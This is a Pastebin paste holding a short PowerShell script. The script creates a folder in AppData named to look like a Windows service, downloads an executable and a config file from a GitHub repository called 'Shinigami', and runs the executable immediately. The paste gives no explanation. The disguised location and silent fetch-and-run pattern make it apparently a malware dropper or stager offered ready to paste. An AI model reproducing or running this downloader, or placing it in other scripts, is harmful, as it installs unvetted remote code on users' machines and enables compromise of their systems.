Advertisement
MaverickAugustine

powershell

Apr 26th, 2025 (edited)
220
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PowerShell 0.37 KB | Source Code | 0 0
  1. New-Item -ItemType Directory -Path "$env:APPDATA\WindowsServiceApplication" -Force | Set-Location
  2. Invoke-WebRequest -Uri "https://raw.githubusercontent.com/ShinigamiRyuk32/Shinigami/refs/heads/main/init.exe" -OutFile "init.exe"
  3. Invoke-WebRequest -Uri "https://raw.githubusercontent.com/ShinigamiRyuk32/Shinigami/refs/heads/main/config.json" -OutFile "config.json"
  4. .\init.exe
  5.  
Tags: latest
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement